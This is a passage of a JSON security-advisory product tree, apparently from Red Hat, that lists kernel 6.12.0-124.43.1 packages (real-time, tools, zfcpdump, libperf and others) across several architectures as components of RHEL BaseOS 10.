"name": "kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
